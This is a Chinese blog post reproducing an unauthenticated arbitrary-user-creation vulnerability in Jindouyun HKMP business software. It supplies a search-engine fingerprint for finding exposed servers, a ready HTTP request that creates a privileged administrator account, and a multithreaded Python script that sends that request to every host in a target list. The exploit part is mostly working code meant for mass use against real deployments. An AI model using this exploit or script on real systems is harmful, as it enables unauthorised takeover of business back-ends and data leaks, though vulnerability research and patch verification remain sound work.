金斗云 HKMP智慧商业软件 任意用户创建漏洞复现

已于 2024-07-15 11:17:04 修改
阅读量117 收藏 4
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全
于 2024-07-15 11:11:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74355719/article/details/140433337
版权

漏洞描述

金斗云 HKMP是一款由金斗云软件科技(深圳)有限公司开发的智慧商业管理系统,旨在帮助企业实现高效经营和数字化转型。 金斗云 HKMP智慧商业软件 /admin/user/add 接口存在任意用户创建漏洞,未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。

漏洞危害

未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。

fofa

body="金斗云 Copyright"

poc

POST /admin/user/add HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate

{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067,"nonce":5223015867,"sign":"hkmp","data":{"userCode":"aaaa","userName":"aaaa","password":"aaaa","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}}

脚本

import requests
import threading
from urllib.parse import urlparse
import urllib3
# 禁用SSL警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def POC_1(target_url):
    parsed_url = urlparse(target_url)
    host = parsed_url.netloc
    vuln_url = target_url + "/admin/user/add"

    headers = {
        "Host": host,
        "Content-Type": "application/json;charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0",
        "X-Requested-With": "XMLHttpRequest",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate"
    }
    data = {
        "appId": "hkmp",
        "mchId": "hkmp",
        "deviceId": "hkmp",
        "timestamp": 1719305067,
        "nonce": 5223015867,
        "sign": "hkmp",
        "data": {
            "userCode": "aaaa",
            "userName": "aaaa",
            "password": "aaaa",
            "privilege": ["1000", "8000", "8010", "2000", "2001", "2010", "7000"],
            "adminUserCode": "admin",
            "adminUserName": "系统管理员"
        }
    }

    try:
        response = requests.post(url=vuln_url, headers=headers, json=data, timeout=5, verify=False)
        if response.status_code == 200 and "成功" in response.text:
            with open("存在漏洞的url.txt", 'a', encoding='UTF-8') as f:
                print(f"\033[32m[o] 目标 {target_url} 存在漏洞")
                f.write(target_url + "\n")
        else:
            print(f"\033[31m[x] 目标 {target_url} 不存在漏洞")
    except Exception as e:
        print(f"\033[31m[x] 请求失败 {target_url}: {e}")

def main():
    threads = []

    with open("./target.txt", "r", encoding='UTF-8') as f:
        for line in f:
            ip = line.strip()
            thread = threading.Thread(target=POC_1, args=(ip,))
            threads.append(thread)
            thread.start()

    for thread in threads:
        thread.join()

if __name__ == "__main__":
    main()
b1n8
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
金斗 HKMP智慧商业软件 download 任意文件读取漏洞复现
0xSec
07-12 417
金斗 HKMP智慧商业软件 download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现金斗 HKMP智慧商业软件 任意用户创建漏洞
siu~
07-03 772
金斗 HKMP智慧商业软件 /admin/user/add 接口存在任意用户创建漏洞,未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。
金斗HKMP智慧商业软件存在逻辑缺陷漏洞
weixin_43167326的博客
07-04 975
金斗智慧商业软件是一款功能强大、易于使用的智慧
金斗HKMP智慧商业软件任意文件下载漏洞复现 [附POC]
薛定谔嘚喵博客
07-12 68
青岛和正信息技术有限公司金斗HKMP智慧商业软件存在任意文件下载漏洞
金斗HKMP智慧商业软件存在任意文件下载漏洞
weixin_43167326的博客
07-12 989
青岛和正信息技术有限公司,成立于2010年,位于山东省青岛市,是一家以从事软件和信息技术服务业为主的企业。青岛和正信息技术有限公司金斗HKMP智慧商业软件存在任意文件下载漏洞
漏洞复现金斗 HKMP智慧商业软件 download 任意文件读取漏洞
siu~
07-17 263
金斗 HKMP智慧商业软件 download 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现金斗 HKMP智慧商业软件 download 任意文件读取漏洞
qq_39894062的博客
07-12 347
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
金斗提醒软件的原理
deform0032的博客
01-14 304
时间越来越宝贵,是时候改进您对事情的安排方法了! 工作中我们总是被各种各样的事情、任务围绕着,这些事情有的琐碎,有的费时费力,有的细节,有的宏观。那么如何更好的安排时间去处理这些事情呢? 一个简单的方法就是对任务进行分类。金斗提醒以“四象限”法为指导原则来帮您管理任务。四象限法是美国管理学家科维提出的一个时间管理的理论,把工作按照重要和紧急两...
金斗软件反结帐怎么结_设计电子商务产品组合:完整结帐
Web design 教程小屋
07-07 278
在上一课中,我们看到了用户未登录时结帐页面的外观。但是,如果他们登录了该怎么办? 好吧,我们需要进行一些更改,所以让我们看看它们是什么。 完成结帐 有用的资源 如果您想了解有关Sketch的更多信息或为电子商务设计,以下链接将为您提供帮助。 请记住 :您可以通过每月15美元的订阅费访问Envato Tuts +上的所有课程,也可以仅以5美元的价格单独购买每门课程! 关于Enva...
手机控制电脑使用帮助
11-25
1.硬件信息(-) 2.系统管理(+) (一) ||任务管理器(-) ||Cmd命令 ||远程开机 ||关闭显示器 ||开启显示器 ||关闭电脑 ||重启电脑 ||弹出信息框 ||电脑静音 ... 3.... 4.... 5.... 6.... ||停止服务
销售管理系统培训PPT.pptx
10-09
可以在新建客户后立即添加联系人,也可直接通过“新建联系人”入口来创建。 5. **销售活动管理**: 销售活动是评估销售人员表现的重要依据,包括电话、拜访和陪同拜访。每种类型的活动都有相应的得分标准,且只有...
捷配总结的SMT工厂安全防静电规则
tyymm的博客
07-17 386
SMT工厂须熟记的安全防静电规则! 安全对于我们非常重要,特别是我们这种SMT加工厂,通常我们所讲的安全是指人身安全。 但这里我们须树立一个较为全面的安全常识就是在强调人身安全的同时亦必须注意设备、产品的安全。 电气: 怎样预防人身触电事故? 1、发现有损坏的开关,电线等电气安全隐患,赶快向有关人员报告处理。2、不懂电气技术的人对电气设备不要乱装、乱拆。3、不要用湿手、湿脚动用电气设备(如: 按开关、按钮)。4、清扫卫生时,不要用湿抹布擦电线、开关按钮,一定要搞卫生,请先断开电
AI安全系列——[第五空间 2022]AI(持续更新)
2201_76139143的博客
07-15 1008
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢复隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
OWASP 移动应用 2024 十大安全风险
shendong70的博客
07-14 1233
随着智能手机的快速发展,移动应用已经成为我们日常生活关系最密切的软件应用。开放全球应用程序安全项目(OWASP)基金会,致力于提高软件的安全性。自 2014、2016年发布了移动应用的十大风险后,今年再次发布2024版。这对移动应用软件的检查工具有着重要的指导作用。
浅谈安数智能安全运营管理平台:DCS-SOAR
2401_82472120的博客
07-15 796
安数DCS-SOAR平台致力于解决用户上资产的安全运营问题,面对用户防护设备繁杂臃肿、安全事件难以及时响应、运营成本逐年上升的困境,安数DCS-SOAR平台以安全大脑驱动为核心,建立运营体系,通过OneStep框架实现第三方安全产品的“无门槛接入、低门槛纳管”;威胁和告警数量不断增长,资源又不足以应对所有问题,在日常运营中,分析人员需要快速决定哪些告警需要处理,哪些可以忽略,但由于超负荷工作,很可能错过真正的威胁,在应对威胁和恶意攻击时出现误判,最终使网络及数据产生安全泄露,造成无可挽回的损失。
高性能、安全、低碳绿色的趋势下,锐捷网络发布三擎办公解决方案 3.0
最新发布
CSDN云计算
07-18 571
去确保性能体验流畅。与上一代产品相比,三擎办公 3.0 新增 130+功能特性,不仅充分对标了主流桌面平台的核心功能,如热补丁升级与第三方存储和计算平台支持,还通过一系列创新技术,如智能透明加密技术,独享应用虚拟化技术,增强协议技术,智能 IO 调度技术等,在体验、安全、降本、增效等多个维度上展现出差异化优势。近日,锐捷网络重磅发布了三擎办公解决方案 3.0,针对新趋势下挑战,一口气推出了 130 多项功能特性,希望为用户构建一个集安全、高效、体验于一身,实现成本优化的桌面办公系统环境。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值